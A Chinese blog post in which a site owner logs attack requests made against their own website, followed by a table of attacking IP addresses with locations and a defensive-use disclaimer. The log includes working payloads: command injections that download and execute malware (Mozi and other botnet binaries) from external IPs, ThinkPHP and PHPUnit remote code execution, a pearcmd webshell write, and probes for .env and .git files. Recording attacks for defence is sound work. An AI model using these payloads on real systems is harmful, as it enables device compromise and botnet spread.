原创

简单的漏洞执行参数


1、说明

记录自己网站中被攻击的一些例子,执行方式为通过域名后缀携带执行代码的方式进行攻击尝试。

域名使用 http://www.test.com 作为展示使用。

2、具体示例

http://www.test.com/bak.zip
http://www.test.com/backup_11062022.tar
http://www.test.com/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/solr/admin/cores?action=STATUS&wt=json
http://www.test.com//vendor/phpunit/phpunit/phpunit.xsd
http://www.test.com/.svn/wc.db
http://www.test.com/robots.txt
http://www.test.com/.env
http://www.test.com/.env.example
http://www.test.com/.env.backup
http://www.test.com/core/.git/config
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/ttd.exe
http://www.test.com/cgi-bin/login.cgi
http://www.test.com/cgi-bin/luci/;stok=/locale
http://www.test.com/cgi-bin/jarrewrite.sh
http://www.test.com/.vscode/sftp.json
http://www.test.com/login.jsp
http://www.test.com/manage/account/login
http://www.test.com/systembc/password.php
http://www.test.com/.well-known/security.txt
http://www.test.com/wp-includes/wlwmanifest.xml
http://www.test.com/xmlrpc.php
http://www.test.com/Tva1
http://www.test.com/.DS_Store
http://www.test.com/cf_scripts/scripts/ajax/ckeditor/ckeditor.js
http://www.test.com/aab9
http://www.test.com/_profiler/phpinfo
http://www.test.com/videos/vts/20230726/d9/14/4d5cb760df60039c3feb18b24ba13a1c.ts
http://www.test.com/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
http://www.test.com/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)
http://www.test.com/?tag&tagstpl=news.html&tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}&t=file_put_contents&t1=b5ac9b2ee49f0ee2aa0db9db957dc613.php&t2=file_get_contents&t3=https://xingzuo.zhlgch.compbcms.txt
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
http://www.test.com/index.php?lang=../../../../../../../../tmp/index1
http://www.test.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60)
http://www.test.com/index/ajax/lang?lang=../../application/database
http://www.test.com/dns-query?dns=sJQBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
http://www.test.com/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
http://www.test.com/index.php?acti=search&g=global&s=api&name=content_news.html&f=database&suffix=html&c=api&key=id&m=template&usr=admin&catid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&cat%5Bpid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&index%5Bid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&searchid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&urlrule=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&form_table=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A
http://www.test.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application

3、声明

本文将持续更新,内容仅作为记录展示以及防范使用,禁止做非法用途,后果自行自行承担

4、被攻击过的IP

记录攻击过的IP,基本是国际的肉机,国内的也基本是地区的电信代理商公有IP,不能直接禁用,不然可能造成该地区无法正常访问。曾出现阿里云的IP,不过阿里云拒绝提供该IP的其他信息给个人,没造成什么损失,不予追究,若是有造成损失,可报有关机关调取信息。下面是具体的记录。

IP地址 真实地址 经度 纬度
43.138.241.199 中国北京市海淀 116.302 39.9786
120.85.113.193 中国广东广州市[联通] 113.2539 23.1181
113.215.189.97 中国浙江省澧浦镇[华数] 119.789 29.1416
113.215.189.226 中国浙江省澧浦镇[华数] 119.789 29.1416
106.75.6.251 中国上海Yangpu [UCLOUD] 121.508 31.2999
103.194.186.10 香港中西區Sheung Wan 114.149 22.2862
94.156.65.8 保加利亚Plovdiv卡爾洛沃 24.7995 42.627
31.220.1.83 荷兰北荷兰省阿姆斯特丹 4.90414 52.3676
80.94.92.60 荷兰北荷兰省阿姆斯特丹 4.90414 52.3676
91.92.249.4 荷兰北荷兰省阿姆斯特丹 4.90414 52.3676
128.90.170.21 波兰Mazovia华沙 20.9846 52.1828
45.124.84.224 越南北寧省Phúc Lai 20.9652 105.79
51.222.253.2 新加坡Central Singapore新加坡 103.851 1.28141
128.199.222.142 新加坡South West新加坡 103.695 1.32123
78.153.140.177 英国英格兰伦敦 -0.093 51.5088
78.153.140.224 英国英格兰伦敦 -0.093 51.5088
78.153.140.175 英国英格兰伦敦 -0.093 51.5088
78.153.140.222 英国英格兰伦敦 -0.093 51.5088
195.191.219.130 英国英格兰伦敦 -0.1196 51.5074
185.164.121.40 德国黑森州法兰克福 8.7321 50.1093
45.142.182.92 德国北莱茵-威斯特法伦于巴赫-帕伦贝格 6.11938 50.9199
148.153.56.86 美国加州洛杉矶 -118.2441 34.0544
148.153.45.234 美国加州洛杉矶 -118.2441 34.0544
54.164.169.144 美国弗吉尼亚州Ashburn -77.4874 39.0438
142.202.48.16 美国纽约州纽约 -74.0059 40.7127
34.239.164.71 美国弗吉尼亚州Ashburn -77.4874 39.0438
52.167.144.67 美国弗吉尼亚州Boydton -78.37471 36.677696
162.216.150.228 美国南卡罗来纳州查尔斯顿 -80.013 32.8771
204.12.231.82 美国密苏里州堪薩斯城 -94.5786 39.1374
64.225.59.234 美国新泽西州克利夫頓 -74.1403 40.8364
194.38.23.16 乌克兰Dnipropetrovsk Oblast聶伯城 35.046 48.4735
65.109.134.233 芬兰新地区赫尔辛基 24.9344 60.1797
43.158.217.137 印度马哈拉施特拉邦Mumbai 72.8776 19.0759
179.43.143.42 瑞士苏黎世州苏黎世 8.5163 47.3934
8.211.162.45 日本东京都东京 139.6899 35.6893
80.14.8.244 法国法兰西岛奥贝维埃 2.38405 48.9123
54.36.148.247 法国上法兰西大区鲁贝 3.20157 50.6917
入侵扫描
  • 作者:一介闲人(联系作者)
  • 发表时间: 2024-09-05 10:09
  • 版权声明:原创-转载需保持署名
  • 公众号转载:请在文末添加本文链接
  • 评论

    张三
    记录